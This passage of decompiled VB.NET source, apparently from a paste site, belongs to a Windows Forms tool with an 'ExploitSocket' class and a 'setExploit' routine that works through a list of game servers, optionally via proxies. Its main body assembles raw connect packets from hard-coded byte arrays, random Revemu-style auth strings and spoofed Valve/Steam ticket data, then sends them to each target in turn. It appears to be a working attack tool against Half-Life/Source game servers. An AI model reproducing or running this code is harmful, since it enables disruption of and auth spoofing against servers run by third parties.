  2686. Me.textBox7.Text = "_pw"
  2687. End If
  2688. If String.IsNullOrEmpty(Me.asd2.Text) Then
  2689. Me.asd2.Text = (num16)
  2690. End If
  2691. userInfo = (userInfo & str14 & str12)
  2692. ElseIf Not Me.checkBox5.Checked Then
  2693. If String.IsNullOrEmpty(Me.textBox7.Text) Then
  2694. Me.textBox7.Text = "_pw"
  2695. End If
  2696. If String.IsNullOrEmpty(Me.asd2.Text) Then
  2697. Me.asd2.Text = (num16)
  2698. End If
  2699. userInfo = (userInfo & str12 & str11)
  2700. End If
  2701. If (Me.AuthtypeComboBox.SelectedIndex = 1) Then
  2702. Me.textBox8.Text = "VALVE_ID_LAN"
  2703. End If
  2704. Dim list2 As New List(Of Byte)
  2705. If (Me.AuthtypeComboBox.SelectedIndex = 0) Then
  2706. If Me.checkBox14.Checked Then
  2707. list2.AddRange(DirectCast(New Byte() { 20, 0, 0, 0, 200, 120, &H75, 4, 120, &H9F, &HC0, &H54, &HFE, &H37, &H69, &H17, 1, 0, &H10, 1, &HC4, &H10, &HDD, &H58, &HB2, 0, 0, 0, 50, 0, 0, 0, 4, 0, 0, 0, &HFE, &H37, &H69, &H17, 1, 0, &H10, 1, 10, 0, 0, 0, &H67, &H17, &H4C, &H5F, 30, 0, &HA8, &HC0, 0, 0, 0, 0, &H89, &HF6, 210, &H58, 9, &HA6, &HEE, &H58, 1, 0, 7, 0, 0, 0, 0, 0, 0, 0, &H91, &HE4, &H90, &HA2, &H35, &H75, 9, 90, 40, &HDD, &HB6, 50, &HB9, &HD0, &H4D, &H1F, &H10, &H39, 0, &H26, 30, &HA7, &HA9, &HE0, &H9F, &H8E, &HBC, 170, &HF6, &H71, &HF3, &HB0, &H35, &HFD, &H17, 10, &HD4, &H20, 70, &H4D, &HFF, 190, &H98, &H8B, &HBF, &H35, 50, &H67, &H2D, &H3A, 13, &HA4, 230, &H8F, &HE1, &H65, &HEF, &HE3, &HC4, &H73, &H52, &HD0, &HB8, &H80, &H3B, &H6F, &H6D, &HA3, 30, &HDA, &H4A, &HD7, &H57, &H10, &H9F, &H9E, &H7E, &H26, &H29, &HBA, 170, &H52, &HD5, 7, 2, &H8F, &H83, 180, 120, &H51, 1, &H9C, &H23, &H62, &HE5, &HB8, &H19, 240, &HB1, &H21, &H7B, &HB1, 80, &H57, &H1F, 0, &H37, &H8A, &H74, &H7C, &H5E, &H72, &H62, &H51, &H98, &HDF, &H17, 10, &H7E, &H38, 140, &HCA, &H1A, &HA5, &HA3, &H1C, &H4B, &H3D }, IEnumerable(Of Byte)))
  2708. Else
  2709. Dim buffer3 As Byte()
  2710. If Not (Me.checkBox2.Checked OrElse Me.checkBox14.Checked) Then
  2711. list2.AddRange(DirectCast(New Byte() { &H4A, 0, 0, 0, &H39, 5, 0, 0, &H76, &H65, &H72, 0, 0, 0, 0, 0, &H72, 10, 0, 0, 1, 0, &H10, 1, &H4A, &H38, 50, 90, &H57, &H51, &H41, &H42, &H45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, &H20, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0 }, IEnumerable(Of Byte)))
  2712. End If
  2713. If (Me.comboBox2.SelectedIndex = 2) Then
  2714. list2.AddRange(DirectCast(New Byte() { &HFF, &HFF }, IEnumerable(Of Byte)))
  2715. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(8)), IEnumerable(Of Byte)))
  2716. End If
  2717. If (Me.comboBox2.SelectedIndex = 3) Then
  2718. buffer3 = New Byte(4 - 1) {}
  2719. buffer3(0) = 20
  2720. list2.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  2721. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(8)), IEnumerable(Of Byte)))
  2722. list2.AddRange(DirectCast(New Byte() { &HFF }, IEnumerable(Of Byte)))
  2723. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(3)), IEnumerable(Of Byte)))
  2724. list2.AddRange(DirectCast(New Byte() { 1, 0, &H10, 1 }, IEnumerable(Of Byte)))
  2725. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2726. list2.AddRange(DirectCast(New Byte(4 - 1) {}, IEnumerable(Of Byte)))
  2727. End If
  2728. If (Me.comboBox2.SelectedIndex = 5) Then
  2729. list2.AddRange(DirectCast(New Byte() { &H7B, &H7F, &HCA, &HD4, &H23, &H60, &HDB, &HC7, &H1F, &H2E, &H6A, &H6D, 150, &H2A, &H1A, &H21, &H44, &H31, 200, &H3A, 5, &H31, &HC4, 180 }, IEnumerable(Of Byte)))
  2730. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(&H2E8)), IEnumerable(Of Byte)))
  2731. End If
  2732. If (Me.comboBox2.SelectedIndex = 6) Then
  2733. Select Case New Random().Next(7)
  2734. Case 0
  2735. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(80)), IEnumerable(Of Byte)))
  2736. list2.AddRange(DirectCast(New Byte() { &HFF, &HFF, &HFF, &HFF }, IEnumerable(Of Byte)))
  2737. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(&H2AC)), IEnumerable(Of Byte)))
  2738. Exit Select
  2739. Case 1
  2740. buffer3 = New Byte(4 - 1) {}
  2741. buffer3(0) = &H4A
  2742. list2.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  2743. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2744. list2.AddRange(DirectCast(New Byte() { &H76, &H65, &H72 }, IEnumerable(Of Byte)))
  2745. list2.AddRange(DirectCast(New Byte(5 - 1) {}, IEnumerable(Of Byte)))
  2746. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2747. list2.AddRange(DirectCast(New Byte(4 - 1) {}, IEnumerable(Of Byte)))
  2748. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(12)), IEnumerable(Of Byte)))
  2749. Dim list3 As List(Of Byte) = list2
  2750. Dim buffer As Byte() = New Byte(&H7C - 1) {}
  2751. buffer(&H6C) = 20
  2752. buffer(&H70) = 1
  2753. list3.AddRange(DirectCast(buffer, IEnumerable(Of Byte)))
  2754. Exit Select
  2755. Case 2
  2756. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(80)), IEnumerable(Of Byte)))
  2757. list2.AddRange(DirectCast(New Byte() { &HFF, &HFF, &HFF, &HFF }, IEnumerable(Of Byte)))
  2758. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(&H2AC)), IEnumerable(Of Byte)))
  2759. Exit Select
  2760. Case 3
  2761. list2.AddRange(DirectCast(New Byte() { &HFF, &HFF }, IEnumerable(Of Byte)))
  2762. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(8)), IEnumerable(Of Byte)))
  2763. Exit Select
  2764. Case 4
  2765. buffer3 = New Byte(4 - 1) {}
  2766. buffer3(0) = 20
  2767. list2.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  2768. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(12)), IEnumerable(Of Byte)))
  2769. list2.AddRange(DirectCast(New Byte() { 1, 0, &H10, 1 }, IEnumerable(Of Byte)))
  2770. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2771. list2.AddRange(DirectCast(New Byte(4 - 1) {}, IEnumerable(Of Byte)))
  2772. Exit Select
  2773. Case 5
  2774. buffer3 = New Byte(4 - 1) {}
  2775. buffer3(0) = 20
  2776. list2.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  2777. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(8)), IEnumerable(Of Byte)))
  2778. list2.AddRange(DirectCast(New Byte() { &HFF }, IEnumerable(Of Byte)))
  2779. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(3)), IEnumerable(Of Byte)))
  2780. list2.AddRange(DirectCast(New Byte() { 1, 0, &H10, 1 }, IEnumerable(Of Byte)))
  2781. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2782. list2.AddRange(DirectCast(New Byte(4 - 1) {}, IEnumerable(Of Byte)))
  2783. Exit Select
  2784. Case 6
  2785. list2.AddRange(DirectCast(New Byte() { &H7B, &H7F, &HCA, &HD4, &H23, &H60, &HDB, &HC7, &H1F, &H2E, &H6A, &H6D, 150, &H2A, &H1A, &H21, &H44, &H31, 200, &H3A, 5, &H31, &HC4, 180 }, IEnumerable(Of Byte)))
  2786. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(&H2E8)), IEnumerable(Of Byte)))
  2787. Exit Select
  2788. Case 7
  2789. list2.AddRange(DirectCast(New Byte() { &H7B, &H7F, &HCA, &HD4, &H23, &H60, &HDB, &HC7, &H1F, &H2E, &H6A, &H6D, 150, &H2A, &H1A, &H21, &H44, &H31, 200, &H3A, 5, &H31, &HC4, 180 }, IEnumerable(Of Byte)))
  2790. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(&H2E8)), IEnumerable(Of Byte)))
  2791. Exit Select
  2792. End Select
  2793. End If
  2794. If (Me.comboBox2.SelectedIndex = 4) Then
  2795. buffer3 = New Byte(4 - 1) {}
  2796. buffer3(0) = 20
  2797. list2.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  2798. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(12)), IEnumerable(Of Byte)))
  2799. list2.AddRange(DirectCast(New Byte() { 1, 0, &H10, 1 }, IEnumerable(Of Byte)))
  2800. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2801. list2.AddRange(DirectCast(New Byte(4 - 1) {}, IEnumerable(Of Byte)))
  2802. End If
  2803. If (Me.comboBox2.SelectedIndex = 0) Then
  2804. buffer3 = New Byte(4 - 1) {}
  2805. buffer3(0) = &H4A
  2806. list2.AddRange(DirectCast(buffer3, IEnumerable(Of Byte)))
  2807. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2808. list2.AddRange(DirectCast(New Byte() { &H76, &H65, &H72 }, IEnumerable(Of Byte)))
  2809. list2.AddRange(DirectCast(New Byte(5 - 1) {}, IEnumerable(Of Byte)))
  2810. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(4)), IEnumerable(Of Byte)))
  2811. list2.AddRange(DirectCast(New Byte(4 - 1) {}, IEnumerable(Of Byte)))
  2812. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(12)), IEnumerable(Of Byte)))
  2813. Dim list4 As List(Of Byte) = list2
  2814. Dim buffer2 As Byte() = New Byte(&H7C - 1) {}
  2815. buffer2(&H6C) = 20
  2816. buffer2(&H70) = 1
  2817. list4.AddRange(DirectCast(buffer2, IEnumerable(Of Byte)))
  2818. End If
  2819. If (Me.comboBox2.SelectedIndex = 1) Then
  2820. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(80)), IEnumerable(Of Byte)))
  2821. list2.AddRange(DirectCast(New Byte() { &HFF, &HFF, &HFF, &HFF }, IEnumerable(Of Byte)))
  2822. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Form1.RandomRevemuString(&H2AC)), IEnumerable(Of Byte)))
  2823. End If
  2824. End If
  2825. End If
  2826. index += 1
  2827. num4 += 1
  2828. Me.LogRichBox.AppendText(String.Concat(New String() { " ", If(Not String.IsNullOrEmpty(str), (str & ">"), ""), Me.ServerListRichBox.Lines(i), ":" & ChrW(10), Me.SendMessage(If(Not String.IsNullOrEmpty(str), str, Me.ServerListRichBox.Lines(i)), userInfo, Me.MessageTxtBox.Text, Me.ProtocolComboBox.Text, list2.ToArray, (Me.ProtocolComboBox.SelectedIndex = 2)), ChrW(10) }))
  2829. Me.LogRichBox.SelectionStart = Me.LogRichBox.Text.Length
  2830. Me.LogRichBox.ScrollToCaret
  2831. j += 1
  2832. Loop
  2833. End If
  2834. Next i
  2835. End If
  2836. End Sub
  2837.  
  2838. Private Sub timer2_Tick_1(ByVal sender As Object, ByVal e As EventArgs)
  2839. Dim index As Integer = 0
  2840. Dim i As Integer
  2841. For i = 0 To Me.ServerListRichBox.Lines.Length - 1
  2842. Dim str As String = If((Me.HLProxyRichBox.Text.Length > 0), Me.HLProxyRichBox.Lines(index), Nothing)
  2843. Me.setExploit(If(Not String.IsNullOrEmpty(str), str, Me.ServerListRichBox.Lines(i)))
  2844. Next i
  2845. Dim num3 As Integer = (index + 1)
  2846. End Sub
  2847.  
  2848.  
  2849. ' Fields
  2850. Friend asd2 As TextBox
  2851. Friend AuthtypeComboBox As ComboBox
  2852. Friend Button1 As Button
  2853. Friend button2 As Button
  2854. Private button4 As Button
  2855. Private button5 As Button
  2856. Friend button6 As Button
  2857. Friend button7 As Button
  2858. Private button8 As Button
  2859. Private checkBox1 As CheckBox
  2860. Private checkBox10 As CheckBox
  2861. Private checkBox11 As CheckBox
  2862. Private checkBox12 As CheckBox
  2863. Private checkBox13 As CheckBox
  2864. Private checkBox14 As CheckBox
  2865. Private checkBox16 As CheckBox
  2866. Private checkBox17 As CheckBox
  2867. Private checkBox18 As CheckBox
  2868. Private checkBox19 As CheckBox
  2869. Private checkBox2 As CheckBox
  2870. Private checkBox3 As CheckBox
  2871. Private checkBox4 As CheckBox
  2872. Private checkBox5 As CheckBox
  2873. Private checkBox6 As CheckBox
  2874. Private checkBox7 As CheckBox
  2875. Private checkBox8 As CheckBox
  2876. Private checkBox9 As CheckBox
  2877. Friend comboBox1 As ComboBox
  2878. Friend comboBox2 As ComboBox
  2879. Friend comboBox3 As ComboBox
  2880. Private components As IContainer = Nothing
  2881. Private countT As Integer = 0
  2882. Private Data As ExploitSocket = New ExploitSocket
  2883. Private groupBox1 As GroupBox
  2884. Private groupBox2 As GroupBox
  2885. Private groupBox3 As GroupBox
  2886. Private groupBox5 As GroupBox
  2887. Private Shared here As Integer
  2888. Friend HLProxyRichBox As TextBox
  2889. Private Shared holdV As Integer
  2890. Public Const HT_CAPTION As Integer = 2
  2891. Friend Label1 As Label
  2892. Friend label10 As Label
  2893. Friend label11 As Label
  2894. Friend label12 As Label
  2895. Friend label13 As Label
  2896. Friend label14 As Label
  2897. Friend label15 As Label
  2898. Friend label16 As Label
  2899. Friend label17 As Label
  2900. Friend label18 As Label
  2901. Friend label19 As Label
  2902. Friend label2 As Label
  2903. Friend label20 As Label
  2904. Friend label21 As Label
  2905. Friend label3 As Label
  2906. Friend Label4 As Label
  2907. Friend label5 As Label
  2908. Friend Label6 As Label
  2909. Friend Label7 As Label
  2910. Friend Label8 As Label
  2911. Friend label9 As Label
  2912. Private LogRichBox As RichTextBox
  2913. Friend MessageTxtBox As TextBox
  2914. Friend method As ComboBox
  2915. Friend NicknamesRichBox As TextBox
  2916. Friend ProtocolComboBox As ComboBox
  2917. Private Shared random As Random = New Random
  2918. Private runOnce As CheckBox
  2919. Private saveSettings As CheckBox
  2920. Friend ServerListRichBox As TextBox
  2921. Private tabControl1 As TabControl
  2922. Private tabPage1 As TabPage
  2923. Private tabPage2 As TabPage
  2924. Private tabPage3 As TabPage
  2925. Private tabPage4 As TabPage
  2926. Private tabPage5 As TabPage
  2927. Friend textBox1 As TextBox
  2928. Private textBox10 As TextBox
  2929. Friend textBox11 As TextBox
  2930. Friend textBox12 As TextBox
  2931. Friend textBox13 As TextBox
  2932. Friend textBox14 As TextBox
  2933. Friend textBox16 As TextBox
  2934. Friend textBox2 As TextBox
  2935. Friend textBox3 As TextBox
  2936. Friend textBox4 As TextBox
  2937. Friend textBox5 As TextBox
  2938. Friend textBox6 As TextBox
  2939. Friend textBox7 As TextBox
  2940. Friend textBox8 As TextBox
  2941. Friend textBox9 As TextBox
  2942. Private timer1 As Timer
  2943. Private timer2 As Timer
  2944. Public Const WM_NCLBUTTONDOWN As Integer = &HA1
  2945. Public Shared xtext As String
  2946. End Class
  2947. End Namespace
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement